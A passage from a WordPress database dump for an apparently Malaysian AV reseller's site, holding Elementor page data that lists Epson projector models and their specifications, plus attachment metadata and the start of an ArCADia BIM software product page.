]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"12\",\"right\":\"12\",\"bottom\":\"12\",\"left\":\"12\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4af8eba\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND EDUCATION\\u00a0\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-2055<\\/strong><\\/h4><p><img class=\\\"wp-image-2434 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split Screen<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"646b12f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"12\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"42\",\"right\":\"42\",\"bottom\":\"42\",\"left\":\"42\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-2142W<\\/strong><\\/h4><br>\\n<img class=\\\"wp-image-2435 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/>\\n\\nEnjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.\\n<ul>\\n \\t<li>White and Colour Brightness at 4,200lm<\\/li>\\n \\t<li>WXGA Resolution<\\/li>\\n \\t<li>12000 hours lamp life in eco-mode<\\/li>\\n \\t<li>MHL-enabled<\\/li>\\n \\t<li>Multi-PC Projection<\\/li>\\n \\t<li>Horizontal Keystone Slider<\\/li>\\n \\t<li>Miracast<sup>\\u00ae<\\/sup><\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-L500W\\u00a0<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2436 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/><br>\\n\\nThe compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.\\n<ul>\\n \\t<li>5,000 lumens colour\\/white brightness<sup>\\u00a0<\\/sup><\\/li>\\n \\t<li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li>\\n \\t<li>Laser light source of up to 20,000 hours<\\/li>\\n \\t<li>Virtually maintenance-free for optical engine life<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd625e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8750887\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"16f2278\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c4ec64b\",\"elType\":\"widget\",\"settings\":{\"title\":\"ACCENT LIGHTING LASER PROJECTORS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f02a57\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"993393a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e46d09c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson LightScene EV-105<\\/strong><br \\/><br \\/><\\/h4><p><img class=\\\"wp-image-2437 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"263\\\" height=\\\"176\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b9132fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5a3decf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"3a36c38\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7dad77c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b7207fe\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"466ac31\",\"elType\":\"widget\",\"settings\":{\"title\":\"ULTRA PORTABLE\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ccb5acc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"45f89fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7ec2bf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-1785W\\u00a0<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2438 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"238\\\" height=\\\"177\\\" \\/>\\n\\nThe Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.\\n<ul>\\n \\t<li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li>\\n \\t<li>WXGA Resolution<\\/li>\\n \\t<li>Real-Time Auto Keystone Correction<\\/li>\\n \\t<li>Split Screen Projection<\\/li>\\n \\t<li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1914d98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b5f42fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e3f8c24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d81ddc4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4f4cdf2\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"890a1d6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INTERACTIVE\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c314a77\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fbcb210\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1897c27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-536Wi\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2439 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1dcee02\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"-5\",\"right\":\"-5\",\"bottom\":\"-5\",\"left\":\"-5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a597712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d315157\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson 595Wi\\/585Wi\\/575Wi<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/h4>\\nWith the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.\\n<ul>\\n \\t<li>WXGA Resolution<\\/li>\\n \\t<li>White and Colour Brightness at 3,300lm<\\/li>\\n \\t<li>Multi-PC projection<\\/li>\\n \\t<li>HDMI Connectivity x2<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8ca10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"61ea7aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5676d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6efc9f3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"281e34f\",\"elType\":\"widget\",\"settings\":{\"title\":\"HIGH BRIGHTNESS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a49451\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f301a8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7e2436\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-L1405UNL\\u00a0<\\/strong><\\/h4><p><br \\/><img class=\\\"wp-image-2441 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><\\/p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.<\\/p><ul><li>White and Colour Brightness at 8,000lm<\\/li><li>WUXGA (1920 x 1200)<\\/li><li>Edge-blending to create large panoramic images<\\/li><li>Curve and corner wall projection<\\/li><li>HDBaseT<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"8bce658\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":122,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"4eeb26d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dd3bc89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6d9f7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Epson EB-G7400UNL\\u00a0<\\/strong><\\/h4><br>\\n<img class=\\\"wp-image-2442 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"116\\\" \\/><br>\\n\\nEpson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.\\n\\n<em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em>\\n<ul>\\n \\t<li>High Brightness<\\/li>\\n \\t<li>Beyond Full HD Resolution<\\/li>\\n \\t<li>Powered Lens<\\/li>\\n \\t<li>Portrait Projection<\\/li>\\n \\t<li>Flexible Installation<\\/li>\\n \\t<li>Edge Blending<\\/li>\\n \\t<li>Point Correction<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2860f60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abe0604\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-Z10000U\\u00a0<\\/strong><\\/h4><p><br \\/><img class=\\\"wp-image-2443 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><\\/p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.<\\/p><ul><li>White and Colour Brightness at 10,000\\u00a0lm<\\/li><li>WUXGA resolution<\\/li><li>High Reliability and Durability<\\/li><li>Suitable for 24\\/7 usage<\\/li><li>Flexible projection angles and installations<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"acb7593\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":144,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"f800ae6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"185e9fb\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cfbc8d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"23a135e\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"52e4017\",\"elType\":\"widget\",\"settings\":{\"title\":\"DOCUMENT CAMERAS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e2f23c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1be2016\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ccccf17\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Document Camera ELPDC21\\u00a0<\\/strong><br><br><img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/h4><br>\\nCut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.\\n<ul>\\n \\t<li>Pixels: 2MP (1920 x 1080 pixels)<\\/li>\\n \\t<li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li>\\n \\t<li>Resolution: Up to Full HD (1080p)<\\/li>\\n \\t<li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li>\\n \\t<li>Weight: Approx 3.0kg<\\/li>\\n<\\/ul>\\n<center>[maxbutton id=\\\"12\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5e60a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b6a1050\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(8131,3505,'_elementor_version','2.5.14'),(8646,3661,'_elementor_template_type','wp-page'),(8647,3661,'_elementor_version','2.7.4'),(8134,3506,'_edit_lock','1571992873:1'),(8135,3506,'_edit_last','1'),(8136,3507,'_wp_attached_file','2019/09/Artboard-12x.png'),(8137,3507,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:24:\"2019/09/Artboard-12x.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Artboard-12x-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Artboard-12x-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"Artboard-12x-768x511.png\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"Artboard-12x-1024x681.png\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:24:\"Artboard-12x-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:24:\"Artboard-12x-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:24:\"Artboard-12x-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:22:\"Artboard-12x-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(8138,3507,'_wp_attachment_image_alt','Arcadia'),(8139,3506,'_thumbnail_id','3507'),(8140,3506,'_yoast_wpseo_content_score','60'),(8739,2940,'_elementor_css','a:5:{s:4:\"time\";i:1572199429;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(8738,1528,'_elementor_css','a:5:{s:4:\"time\";i:1572196962;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(8737,1447,'_elementor_css','a:5:{s:4:\"time\";i:1572142848;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(8167,1,'_wp_old_slug','logitech-announces-logitech-rally'),(8156,1,'_elementor_template_type','post'),(8154,1,'_wp_old_slug','news'),(8157,1,'_elementor_version','2.5.14'),(8174,1483,'swift-performance','a:0:{}'),(8825,3686,'_wp_page_template','template-fullwidth.php'),(8824,3686,'_edit_last','1'),(8823,3686,'_edit_lock','1573021341:1'),(8189,1477,'swift-performance','a:0:{}'),(8364,1529,'_elementor_template_type','post'),(8365,1529,'_elementor_version','2.5.14'),(8373,3629,'_elementor_edit_mode','builder'),(8186,1,'swift-performance','a:0:{}'),(8362,1,'_aioseop_title','Logitech Rally'),(8190,1484,'swift-performance','a:0:{}'),(8191,1474,'swift-performance','a:0:{}'),(8192,1482,'swift-performance','a:0:{}'),(8193,1632,'swift-performance','a:0:{}'),(8194,1634,'swift-performance','a:0:{}'),(8195,1633,'swift-performance','a:0:{}'),(8198,6,'swift-performance','a:0:{}'),(8599,3654,'swift-performance','a:0:{}'),(8600,3654,'_yoast_wpseo_content_score','60'),(8642,3657,'_wp_desired_post_slug','dell-large-format-displays'),(8643,3661,'_edit_lock','1572483131:1'),(8852,1480,'_elementor_css','a:5:{s:4:\"time\";i:1572592103;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(8251,3605,'_edit_lock','1569894721:1'),(8252,3605,'_edit_last','1'),(8253,3605,'_elementor_edit_mode','builder'),(8254,3605,'_elementor_template_type','post'),(8255,3605,'_elementor_version','2.5.14'),(8256,3606,'_edit_lock','1569901111:1'),(8257,3606,'_edit_last','1'),(8258,3606,'_elementor_edit_mode','builder'),(8259,3606,'_elementor_template_type','post'),(8260,3606,'_elementor_version','2.5.14'),(8262,3606,'_wp_page_template','template-fullwidth.php'),(8263,3606,'_elementor_data','[{\"id\":\"d40dbd8\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"c5214dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"space_between_widgets\":10},\"elements\":[{\"id\":\"7b5aa8f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>ArCADia BIM<\\/h2><div>\\u00a0The emergence of the ArCADia BIM system is a logical consequence of the ArCADiasoft philosophy to meet the needs of designers at all stages of project development. The system intelligently supports and coordinates all participants throughout the design process in line with BIM (Building Information Modeling) technology while creating a comprehensive building information database. It provides complete control and security at all stages of design while streamlining and accelerating implementation.<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d2fc327\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a842480\",\"elType\":\"widget\",\"settings\":{\"video_type\":\"hosted\",\"youtube_url\":\"https:\\/\\/www.arcadiabimsystem.com\\/lib\\/m09yeq\\/ArCADia-BIM_640mp4-k0gd9l07.mp4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\",\"insert_url\":\"yes\",\"external_url\":{\"url\":\"https:\\/\\/www.arcadiabimsystem.com\\/lib\\/m09yeq\\/ArCADia-BIM_640mp4-k0gd9l07.mp4\",\"is_external\":\"\",\"nofollow\":\"\"},\"autoplay\":\"yes\",\"loop\":\"yes\",\"controls\":\"\",\"rel\":\"yes\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c45d3b5\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"35deb33\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c3543c6\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b5bcfe4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ff54b6a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e4e5835\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>CONSTRUCTION &amp; ENGINEERING SOFTWARE<\\/h2><p>Arcadia have over 20 years of experience in creating computer applications for the construction industry and more than 100 products for architects and engineers. Our programs range from structural design to interior and installation design to energy performance of buildings calculations to buildings\\u2019 surroundings design.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ef02f15\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cc825cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3e361e3\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b4e625b\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"50e7c30\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"351d3da\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>ArCADia BIM SYSTEM<\\/h2><p style=\\\"text-align: left;\\\">ArCADia BIM is more than twenty industry-specific modules. These include installation solutions for water, sewage, electricity, heating, etc., and programs intended for engineers to construct and calculate. These programs use a common database of objects (buildings), enable full cooperation between the various industries and the exchange of information and projects within and outside the system. ArCADia applications have IFC format support, which allows the user to collaborate with other programs such as Allplan, Archicad, or 